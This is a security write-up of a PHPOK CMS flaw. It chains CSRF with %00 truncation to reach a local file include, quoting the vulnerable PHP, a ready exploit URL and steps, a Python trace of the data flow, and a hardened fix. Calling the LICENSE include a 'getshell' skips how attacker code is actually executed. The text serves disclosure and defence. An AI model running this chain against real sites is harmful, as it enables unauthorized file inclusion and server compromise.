PHPOK combined with CSRF (GET type)-GETSHELL
PHPOK does a reasonable job of input filtering: addslashes is applied to every input parameter. However, addslashes does not provide protection in every scenario, because it only escapes the value for the SQL statement it is about to go into. Here PHPOK is used as an example of that.

The getshell exploits lax filtering on the path passed to include. The code is as follows:
File framework/www/payment_control.php, method submit_f():

function submit_f()
{
    $rs = $this->auth_check();
    // ...
    $payment = $this->get('payment', 'int');
    // ...
    // retrieve the row from the database table qinggan_payment
    $payment_rs = $this->model('payment')->get_one($payment);
    // $payment_rs['code'] is the code field of the qinggan_payment row fetched above
    $file = $this->dir_root . 'payment/' . $payment_rs['code'] . '/submit.php';
    if (!is_file($file)) {
        error(P_Lang('Payment interface exception, please check'), $error_url, 'error');
    }
    // include the file
    include_once($file);
}
The include parameter $file is built from the code field of the database table qinggan_payment, so it is controllable if that field is. Let us continue and check whether the field can be controlled.
File framework/admin/payment_control.php, method save_f():

function save_f()
{
    $gid = $this->get('gid', 'int');
    // external value (from $_GET or $_POST), passed through addslashes
    $code = $this->get('code');
    $id = $this->get('id', 'int');
    // ...
    $data = array('title' => $title, 'code' => $code, 'gid' => $gid);
    // ...
    // store the row: the code value received via get() is written to the code field of the qinggan_payment table
    $this->model('payment')->save($data, $id);
    // ...
}

To sum up: the value of the code parameter received through get() is stored in the database, and the include in submit_f() later reads that same field back out of the database. The attacker therefore controls the include path, which is what makes the getshell possible.

The included file name is 'payment/' . $payment_rs['code'] . '/submit.php', so the trailing '/submit.php' has to be cut off. The code column is only 100 characters long, so the path-length truncation trick is impractical; %00 truncation is used instead. Why is the %00 character not neutralised by addslashes? addslashes does turn the NUL byte into the two characters \0, but that escaping only protects the SQL statement: when the row is stored, the database consumes the escape and the field once again holds a raw NUL byte. This second-order use of the value bypasses the GPC escaping entirely. (NUL-byte truncation of include paths only works on PHP versions before 5.3.4, which started rejecting file paths containing NUL bytes.)

Exploit steps:

1. Use CSRF against a logged-in administrator to add a payment method whose code points at the LICENSE file in the site root:
   http://127.0.0.1/phpok/admin.php?c=payment&f=save&code=../LICENSE%00&gid=1&title=1&status=1
   After truncation the include path becomes dir_root . 'payment/../LICENSE', i.e. the LICENSE file in the site root.

2. On the front end, place an order for a product under "Product display" on the homepage, go to Personal center > Order center > Payment, and select the payment method added in step 1. submit_f() includes the file and the getshell is triggered.

Fix: validate the code input (for example, allow only a plain alphanumeric directory name) before it is stored, and add CSRF protection to the admin save action.
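The data flow described above, modelled in Python as an added example (this is not PHPOK's code): the code= value is escaped by addslashes on the way into SQL, comes back out of the database as a raw NUL byte, and is then truncated by the pre-5.3.4 filesystem calls. Assumptions are labelled in the code: the site root /var/www/phpok, a simplified model of how MySQL consumes backslash escapes in a string literal, and the PHP < 5.3.4 behaviour of stopping at the first NUL byte. A hardened path builder that applies the fix suggested above (allow-list the directory name, then confirm the resolved path stays under payment/) is included for contrast.

```python
import os
import re
from urllib.parse import unquote

# Assumed site layout for this example; PHPOK's real dir_root is whatever the install uses.
DIR_ROOT = "/var/www/phpok"
PAYMENT_DIR = DIR_ROOT + "/payment"


def addslashes(s: str) -> str:
    """Port of PHP's addslashes(): backslash-escape ' " \\ and NUL (NUL becomes the two characters \\0)."""
    return (s.replace("\\", "\\\\")
             .replace("'", "\\'")
             .replace('"', '\\"')
             .replace("\x00", "\\0"))


def mysql_unescape(literal: str) -> str:
    """Simplified model (assumption) of MySQL parsing a backslash-escaped string literal:
    the escapes exist only for the SQL statement, so the stored value has them consumed
    and \\0 is a raw NUL byte again."""
    out, i = [], 0
    while i < len(literal):
        ch = literal[i]
        if ch == "\\" and i + 1 < len(literal):
            nxt = literal[i + 1]
            out.append("\x00" if nxt == "0" else nxt)
            i += 2
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def stored_code(request_value: str) -> str:
    """What save_f() leaves in qinggan_payment.code: escaped for SQL on the way in, raw once stored."""
    return mysql_unescape(addslashes(request_value))


def vulnerable_include_path(code: str) -> str:
    """submit_f()'s path construction plus the NUL truncation that PHP < 5.3.4 applied
    to filesystem paths (is_file/include stopped at the first NUL byte)."""
    raw = PAYMENT_DIR + "/" + code + "/submit.php"
    return os.path.normpath(raw.split("\x00", 1)[0])


# Hardened version: accept only a plain directory name, then confirm the resolved path stays inside payment/.
CODE_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def is_code_allowed(code: str) -> bool:
    return CODE_RE.fullmatch(code) is not None


def safe_include_path(code: str) -> str:
    if not is_code_allowed(code):
        raise ValueError("payment code must be a plain alphanumeric directory name")
    path = os.path.normpath(os.path.join(PAYMENT_DIR, code, "submit.php"))
    if os.path.commonpath([PAYMENT_DIR, path]) != PAYMENT_DIR:
        raise ValueError("payment code escapes the payment directory")
    return path


def attack_trace(csrf_code_param: str) -> dict:
    """Follow the attacker's code= value from the CSRF URL to the final include path."""
    request_value = unquote(csrf_code_param)  # the web server/PHP decode %00 to a NUL byte here
    db_value = stored_code(request_value)
    return {
        "request": request_value,
        "escaped_for_sql": addslashes(request_value),
        "stored": db_value,
        "included": vulnerable_include_path(db_value),
    }


if __name__ == "__main__":
    for stage, value in attack_trace("../LICENSE%00").items():
        print(f"{stage:16} {value!r}")
    print("hardened:", safe_include_path("alipay"))
```

Running the trace on the code= value from the CSRF URL shows addslashes producing "../LICENSE\0", the database storing "../LICENSE" followed by a raw NUL byte, and the vulnerable builder resolving to /var/www/phpok/LICENSE. The hardened builder rejects that value outright; it only validates the stored name, so it is a defence-in-depth measure and does not replace CSRF protection on the admin save action.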